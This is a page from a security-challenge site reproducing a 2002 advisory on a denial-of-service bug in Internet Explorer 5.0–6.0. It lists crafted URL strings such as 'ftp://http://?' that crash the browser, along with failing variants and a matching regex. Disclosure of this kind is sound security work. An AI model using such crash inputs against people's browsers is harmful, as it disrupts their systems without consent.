Skip Navigation

Login





Join! | Login troubles?

Online members

Guests:3
Members:1

damned32 chals

Poll

What's your favorite scripting language for solving challenges?

python (12.4%)

perl (9.2%)

bash (3.2%)

ruby (1.9%)

php (37.5%)

javascript (13.0%)

I'm not convinced scripting saves time, I use a "proper" language for everything I do. (15.6%)

Scripting? Excel for the winners, man! (7.3%)

Total votes: 315
Date added: 2008-06-14

View text

Info
Author BasTijs
Date added 2002-12-01
Last modified 2004-11-29


Internet Explorer DoS

Net Force Security Advisory IEbug-1:

http://www.net-force.nl/IEbugs/IEbug-1.txt

http://www.net-force.nl/index.php?page=advisories.php&action=show&id=3

December 01, 2002





I. Bugs found

- Internet Explorer DoS





II. Vulnerable version(only tested on them):

- Win2k Internet Explorer version 6.0

- Win2k Internet Explorer version 5.0

- WinME Internet Explorer version 6.0

- WinME Internet Explorer version 5.5





III. Details - Internet Explorer DoS



Internet Explorer can`t handle inserting certain characters and will crash. 

After inserting the following code, IE will send the 'Microsoft Internet 

Explorer has encountered a problem and need to be closed' window.



ftp://http://?



Check out the screenshot below for more details:



http://www.net-force.nl/IEbugs/ScreenShotCrash.gif





We tested the bug a bit more and this does work:

ftp://http://?

ftp://a://?

ftp://anythingyyouwant://?

ftp://blahblahblah://blahblahblah?





This does not work:

ftp://://?

ftp://a//?

http://ftp://?

ftp://?://

ftp://blahblahblah:blahblahblah//blahblahblah?



That means, it has to match this RegEx



m°ftp://.+://.*\?°



IV. Credits



BasTijs (bastijs at net-force.nl) - http://www.net-force.nl

ps (ps at topgamers.net) - http://ha-boerse.net